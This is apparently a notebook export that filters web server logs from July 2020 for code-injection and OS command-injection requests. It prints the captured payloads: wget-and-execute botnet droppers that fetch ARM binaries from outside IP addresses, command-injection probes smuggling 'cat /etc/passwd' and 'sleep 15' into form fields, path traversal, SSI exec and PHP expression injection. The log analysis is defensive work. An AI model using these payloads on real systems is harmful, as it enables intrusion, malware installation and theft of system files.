----------------------------------------------------------------------------------------------------
Index: 369700
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369701
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369702
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369703
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369704
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369705
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369706
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369707
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369708
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369709
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369710
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369711
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369712
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369713
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369714
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369715
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369716
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369717
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369718
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369719
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369720
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369721
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369722
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369723
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369724
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369725
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("

In [41]:
pd.set_option("display.max_colwidth", None)

code_injection_terms = ["<script", "<?php", "{{", "}}", "eval(", "alert("]

for idx, body in code_injection_bodies["request_http_request"].items():
    if any(term.lower() in str(body).lower() for term in code_injection_terms):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)

In [53]:
os_command_injection_bodies = df.loc[
    (df["88 - OS Command Injection"] == 1) & df["request_body"].notna(),
    ["timestamp", "request_http_request", "request_body", "88 - OS Command Injection","request_http_method"]
]

os_command_injection_bodies

,timestamp,request_http_request,request_body,88 - OS Command Injection,request_http_method
2961,17/Jul/2020:19:11:23 +0200,/cgi-bin/ViewLog.asp,remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7;chmod+777+Meth,1,POST
4746,17/Jul/2020:19:35:52 +0200,/,"<?xml version=""1.0"" encoding=""UTF-8""?>",1,POST
19273,17/Jul/2020:21:47:52 +0200,/blog/index.php/my-account/edit-password/,password_current=%2Fetc%2Fpasswd&password_1=ZWuAr!&password_2=ZWuAr!&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
19275,17/Jul/2020:21:47:52 +0200,/blog/index.php/my-account/edit-password/,password_current=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&password_1=PWq*-kR#&password_2=PWq*-kR#&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
19276,17/Jul/2020:21:47:52 +0200,/blog/index.php/my-account/edit-password/,password_current=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&password_1=EUSc3H&password_2=EUSc3H&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
...,...,...,...,...,...
517711,19/Jul/2020:11:29:29 +0200,/blog/wp-login.php,log=abjectSausage2&pwd=LkeddDs&rememberme=forever&wp-submit=%24%7B127130%2B563382%7D&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2F&testcookie=1,1,POST
517713,19/Jul/2020:11:29:30 +0200,/blog/wp-login.php,log=wakefulTuna6&pwd=6S#Hf&rememberme=forever&wp-submit=Log+In&redirect_to=%24%7B849676%2B561578%7D&testcookie=1,1,POST
517714,19/Jul/2020:11:29:30 +0200,/blog/wp-login.php,log=boastfulGatorade6&pwd=m_JZdu&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2F&testcookie=%24%7B958183%2B586654%7D,1,POST
544664,19/Jul/2020:12:54:26 +0200,/cgi-bin/ViewLog.asp,remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://51.222.26.189/yakuza.arm7;chmod+777+yakuza.arm7;./yakuza.arm7%3b%23&remoteSubmit=Save,1,POST
544665,19/Jul/2020:13:14:06 +0200,/cgi-bin/ViewLog.asp,remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://152.44.44.68/d/xd.arm7;chmod+777+xd.arm7;./xd.arm7;rm+-rf+xd.arm,1,POST

In [45]:
os_command_injection_bodies["request_http_method"].unique()

array(['POST'], dtype=object)

In [38]:
pd.set_option("display.max_colwidth", None)

command_injection_terms = [";", "&&", "||", "|", "whoami", "cat ", "wget ", "curl ", "bash", "sh "]

for idx, body in os_command_injection_bodies["request_body"].items():
    if any(term.lower() in str(body).lower() for term in command_injection_terms):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)

Index: 2961
 remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7;chmod+777+Meth
----------------------------------------------------------------------------------------------------
Index: 19384
username=mildVenison8&password=tCJgHIv&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=%2Fetc%2Fpasswd&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 21609
username=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&password=VFqR&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2F%3Fmode%3Dgrid&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 22360
username=holisticDoughnut5&password=OJAU5&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fetc%2Fpasswd&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 58845
 remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://152.44.44.68/d/xd.arm7;chmod+777+xd.arm7;./xd.arm7;rm+-rf+xd.arm
----------------------------------------------------------------------------------------------------
Index: 104415
username=dreadfulBoa9&password=AZHuwWl&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 232382
password_current=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C&password_1=ETcyVXT&&password_2=ETcyVXT&&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 233341
username=crushedMagpie3&password=R712fl&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 233655
username=unhappyChowder0&password=NXxHnIb&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C
----------------------------------------------------------------------------------------------------
Index: 241864
log=cautiousPudding3&pwd=41g_avM&&rememberme=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php&testcookie=1
----------------------------------------------------------------------------------------------------
Index: 257260
username=morbidPoultry4%26cat+%2Fetc%2Fpasswd%26&password=PvKyuq&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 257368
password_current=ROGGFk&&password_1=ROGGFk&&password_2=ROGGFk&&_wpnonce=b9dad6a8b5%26%26cat+%2Fetc%2Fpasswd&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 257406
username=awedTruffle3&password=Lhm#A0G&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%60cat+%2Fetc%2Fpasswd%60&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 257442
password_current=abwRJ&&password_1=abwRJ&&password_2=abwRJ&&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes%26cat+%2Fetc%2Fpasswd%26&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 257499
password_current=YKaR5ti&&password_1=YKaR5ti&&password_2=YKaR5ti&&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password%0Acat+%2Fetc%2Fpasswd%0A
----------------------------------------------------------------------------------------------------
Index: 257917
username=pridefulMallard5%0Acat+%2Fetc%2Fpasswd%0A&password=QdkTAuP&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 258007
 remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7;chmod+777+Meth
----------------------------------------------------------------------------------------------------
Index: 258091
username=trustingWildfowl9&password=SY0L-$m&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever%3Bcat+%2Fetc%2Fpasswd%3B
----------------------------------------------------------------------------------------------------
Index: 258100
username=needfulHoopoe4&password=WMdTKl&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever%7Ccat+%2Fetc%2Fpasswd%23
----------------------------------------------------------------------------------------------------
Index: 260625
username=ferventWeaver4&password=AkiCY&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2F%7C%7Csleep+15&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 261176
username=lyingTermite3&password=P&&GOf$l&user-registration-login-nonce=6eac0e2d5f%0Asleep+15%0A&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2F%3Fmode%3Dgrid&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 261334
username=mildFlamingo9&password=2ngO0&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2F%3Fmode%3Dgrid&login=Login&redirect=&rememberme=forever%60sleep+15%60
----------------------------------------------------------------------------------------------------
Index: 261908
username=excitedSyrup8&password=b&&M96l&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%26%26cat+%2Fetc%2Fpasswd&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 261925
username=artisticCockatoo7&password=Dr*S1mN&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%60sleep+15%60&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262139
username=thriftyCrackers4&password=#WG_&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262163
username=jealousRelish2%27%26cat+%2Fetc%2Fpasswd%26%27&password=oXtxq&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262174
username=boastfulSmelt9%22%26sleep+15%26%22&password=2_#YO&J&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262175
username=goofyQuiche0%22%3Bsleep+15%3B%22&password=cb1P4O&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262217
username=troubledCrane8%3Bcat+%2Fetc%2Fpasswd%3B&password=qCBTWX-&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262379
username=grizzledDunbird1&password=$g24W&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=%0Asleep+15%0A&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 262429
username=grizzledOryx6&password=ILN8&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fuser-logout%2F%3F_wpnonce%3D14237a84a5&login=Login&redirect=&rememberme=forever%7C%7Csleep+15
----------------------------------------------------------------------------------------------------
Index: 264904
first_name=ZAP&user_login=abjectKitten6&user_pass=ZAP&user_confirm_password=IafC&&last_name=ZAP&user_email=foo-bar%40example.com&user_confirm_email=foo-bar%40example.com&ur-user-form-id=97&ur-redirect-url=%7C%7Ccat+%2Fetc%2Fpasswd&ur_frontend_form_nonce=371e07a3bf
----------------------------------------------------------------------------------------------------
Index: 264931
first_name=ZAP&user_login=holisticBuzzard2&user_pass=ZAP&user_confirm_password=1$ePT&&last_name=ZAP&user_email=foo-bar%40example.com&user_confirm_email=foo-bar%40example.com&ur-user-form-id=97&ur-redirect-url=&ur_frontend_form_nonce=371e07a3bf%22%26cat+%2Fetc%2Fpasswd%26%22
----------------------------------------------------------------------------------------------------
Index: 264941
first_name=ZAP&user_login=enviousStork3&user_pass=ZAP&user_confirm_password=rop5AUB&&last_name=ZAP&user_email=foo-bar%40example.com&user_confirm_email=foo-bar%40example.com&ur-user-form-id=97&ur-redirect-url=&ur_frontend_form_nonce=371e07a3bf%60cat+%2Fetc%2Fpasswd%60
----------------------------------------------------------------------------------------------------
Index: 264956
first_name=ZAP&user_login=lazyCockatoo0&user_pass=ZAP&user_confirm_password=dFoxI3q&&last_name=ZAP&user_email=foo-bar%40example.com&user_confirm_email=foo-bar%40example.com&ur-user-form-id=97&ur-redirect-url=&ur_frontend_form_nonce=371e07a3bf%0Asleep+15%0A
----------------------------------------------------------------------------------------------------
Index: 362218
username=jubilantToucan9&password=W73xpH4&&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 369611
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369612
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369613
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369614
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369615
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369616
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369617
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369618
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369619
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369620
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369621
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369622
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369623
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369624
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369625
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369626
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369627
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369628
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369629
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369630
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369631
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369632
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369633
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369634
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369635
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369636
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369637
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369638
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369639
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369640
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369641
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369642
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369643
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369644
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369645
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369646
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369647
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369648
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369649
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369650
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369651
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369652
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("

In [42]:
pd.set_option("display.max_colwidth", None)

command_injection_terms = [";", "&&", "||", "|", "whoami", "cat ", "wget ", "curl ", "bash", "sh "]

for idx, body in os_command_injection_bodies["request_http_request"].items():
    if any(term.lower() in str(body).lower() for term in command_injection_terms):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)